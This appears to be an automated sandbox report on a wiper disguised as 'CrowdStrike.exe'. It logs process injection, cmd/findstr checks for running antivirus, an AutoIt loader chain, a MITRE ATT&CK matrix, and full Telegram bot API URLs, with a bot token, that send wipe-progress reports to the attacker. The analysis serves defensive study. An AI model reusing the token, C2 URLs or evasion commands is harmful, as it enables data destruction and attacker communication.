        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597640s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597531s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597421s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597312s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597203s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597093s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599890Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599781Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599671Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599562Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599453Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599343Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599234Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599125Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599015Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598906Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598797Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598687Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598578Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598455Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598218Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598109Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597999Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597889Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597777Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597656Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597520Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597234Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597060Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 596937Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 596827Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599648Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599546Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599286Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599171Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599062Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598953Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598843Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598734Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598623Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598515Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598403Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598093Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597966Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597859Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597743Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597640Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597531Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597421Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597312Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597203Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597093Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Injects a PE file into a foreign processes
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifMemory written: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe base: 700000 value starts with: 4D5AJump to behavior
        Writes to foreign memory regions
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifMemory written: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe base: 700000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifMemory written: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe base: 4DE000Jump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 564784Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "locatedflatrendsoperating" Ukraine Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\LJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\564784\Champion.pif 564784\Champion.pif 564784\LJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifProcess created: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeJump to behavior
        Source: CrowdStrike.exe, 00000000.00000003.1690884529.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, Champion.pif, 0000000A.00000000.1733040835.0000000000E96000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qaC:\ProgramData\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qPC:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qTC:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qrC:\ProgramData\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q-C:\Program Files\Windows Defender\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
        Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		11
        Input Capture        		2
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		1
        Web Service        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API        		1
        Windows Service        		1
        Windows Service        		1
        Deobfuscate/Decode Files or Information        		LSASS Memory16
        System Information Discovery        		Remote Desktop Protocol11
        Input Capture        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)212
        Process Injection        		1
        Obfuscated Files or Information        		Security Account Manager1
        Security Software Discovery        		SMB/Windows Admin Shares1
        Clipboard Data        		11
        Encrypted Channel        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Software Packing        		NTDS3
        Process Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets31
        Virtualization/Sandbox Evasion        		SSHKeylogging3
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        File Deletion        		Cached Domain Credentials1
        Application Window Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Masquerading        		DCSync1
        System Network Configuration Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
        Virtualization/Sandbox Evasion        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
        Process Injection        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1477426 Sample: CrowdStrike.exe Startdate: 21/07/2024 Architecture: WINDOWS Score: 96 42 api.telegram.org 2->42 44 XLuvBdVPcngNKMPfoEAAuT.XLuvBdVPcngNKMPfoEAAuT 2->44 46 icanhazip.com 2->46 56 Multi AV Scanner detection for submitted file 2->56 58 Yara detected Hatef Wiper 2->58 60 Sigma detected: Search for Antivirus process 2->60 64 2 other signatures 2->64 9 CrowdStrike.exe 41 2->9         started        signatures3 62 Uses the Telegram API (likely for C&C communication) 42->62 process4 file5 34 C:\Users\user\AppData\Local\Temp\Job, DOS 9->34 dropped 66 Found stalling execution ending in API Sleep call 9->66 13 cmd.exe 3 9->13         started        signatures6 process7 file8 40 C:\Users\user\AppData\Local\...\Champion.pif, PE32 13->40 dropped 70 Drops PE files with a suspicious file extension 13->70 17 Champion.pif 1 13->17         started        21 cmd.exe 2 13->21         started        23 conhost.exe 13->23         started        25 7 other processes 13->25 signatures9 process10 file11 32 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 17->32 dropped 52 Writes to foreign memory regions 17->52 54 Injects a PE file into a foreign processes 17->54 27 RegAsm.exe 15 5 17->27         started        signatures12 process13 dnsIp14 48 api.telegram.org 149.154.167.220, 443, 49739, 49741 TELEGRAMRU United Kingdom 27->48 50 icanhazip.com 104.16.185.241, 49737, 49740, 49742 CLOUDFLARENETUS United States 27->50 36 C:\Users\user\...\ListOpenedFileDrv_32.sys, PE32 27->36 dropped 38 C:\Users\user\AppData\...\OpenFileFinder.dll, PE32 27->38 dropped 68 Sample is not signed and drops a device driver 27->68 file15 signatures16

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        CrowdStrike.exe20%VirustotalBrowse
        CrowdStrike.exe16%ReversingLabsWin32.Trojan.Malgent

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\564784\Champion.pif7%ReversingLabs
        C:\Users\user\AppData\Local\Temp\564784\Champion.pif3%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe0%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\Job0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\Job0%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sys0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sys3%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\OpenFileFinder.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\OpenFileFinder.dll0%VirustotalBrowse

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        api.telegram.org2%VirustotalBrowse
        icanhazip.com1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Drive%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:115%E2%80%99597%0D%0ATime%20:2024/07/21%2005:16:17%0D%0A0%Avira URL Cloudsafe
        http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
        https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Users%20Fodler%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0Aundeleted%20Files%20:107%E2%80%99845%0D%0ATime%20:2024/07/21%2005:16:39%0D%0A0%Avira URL Cloudsafe
        https://api.telegram.org/bot0%Avira URL Cloudsafe
        https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Other%20Drives%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:0%0D%0ATime%20:2024/07/21%2005:15:560%Avira URL Cloudsafe
        http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
        https://api.telegram.org/bot1%VirustotalBrowse
        http://icanhazip.com0%Avira URL Cloudsafe
        http://icanhazip.com/0%Avira URL Cloudsafe
        https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:98%E2%80%99718%0D%0ATime%20:2024/07/21%2005:17:22%0D%0A0%Avira URL Cloudsafe
        https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
        https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Start%20Wipe%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0ADomain%20:user-PC%0D%0AUser%20:user%0D%0AWindows%20Drive%20:C:%5C%0D%0A--------------------%0D%0ADisk%20by%20GB%0D%0AC:%5C%7CFixed%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A-----%0D%0AAllDrive%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A--------------------%0D%0AAmount%20of%20Files%0D%0AWindows%20Drive%20:Other%20Folders%20:115%E2%80%99597%0D%0AUsers%20Folders%20:107%E2%80%99845%0D%0AApp%20Folder%20:40%E2%80%99821%0D%0AWindows%20Folder:98%E2%80%99718%0D%0A-----%0D%0AOther%20Drives%20:0%0D%0A--------------------%0D%0ATime%20:2024/07/21%2005:14:51%0D%0A0%Avira URL Cloudsafe
        https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20App%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:40%E2%80%99821%0D%0A%D8%B2%D9%85%D8%A7%D9%86%20:2024/07/21%2005:16:59%0D%0A0%Avira URL Cloudsafe
        http://icanhazip.com1%VirustotalBrowse
        http://icanhazip.com/1%VirustotalBrowse
        https://www.autoitscript.com/autoit3/0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        api.telegram.org
        		149.154.167.220
        		truetrueunknown
        icanhazip.com
        		104.16.185.241
        		truefalseunknown
        XLuvBdVPcngNKMPfoEAAuT.XLuvBdVPcngNKMPfoEAAuT
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Drive%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:115%E2%80%99597%0D%0ATime%20:2024/07/21%2005:16:17%0D%0Afalse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Other%20Drives%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:0%0D%0ATime%20:2024/07/21%2005:15:56false
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Users%20Fodler%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0Aundeleted%20Files%20:107%E2%80%99845%0D%0ATime%20:2024/07/21%2005:16:39%0D%0Afalse
          • Avira URL Cloud: safe
          		unknown
          http://icanhazip.com/false
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:98%E2%80%99718%0D%0ATime%20:2024/07/21%2005:17:22%0D%0Afalse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Start%20Wipe%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0ADomain%20:user-PC%0D%0AUser%20:user%0D%0AWindows%20Drive%20:C:%5C%0D%0A--------------------%0D%0ADisk%20by%20GB%0D%0AC:%5C%7CFixed%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A-----%0D%0AAllDrive%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A--------------------%0D%0AAmount%20of%20Files%0D%0AWindows%20Drive%20:Other%20Folders%20:115%E2%80%99597%0D%0AUsers%20Folders%20:107%E2%80%99845%0D%0AApp%20Folder%20:40%E2%80%99821%0D%0AWindows%20Folder:98%E2%80%99718%0D%0A-----%0D%0AOther%20Drives%20:0%0D%0A--------------------%0D%0ATime%20:2024/07/21%2005:14:51%0D%0Afalse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20App%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:40%E2%80%99821%0D%0A%D8%B2%D9%85%D8%A7%D9%86%20:2024/07/21%2005:16:59%0D%0Afalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/JCrowdStrike.exe, 00000000.00000003.1696924451.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Champion.pif, 0000000A.00000000.1733135442.0000000000EA9000.00000002.00000001.01000000.00000005.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/botRegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
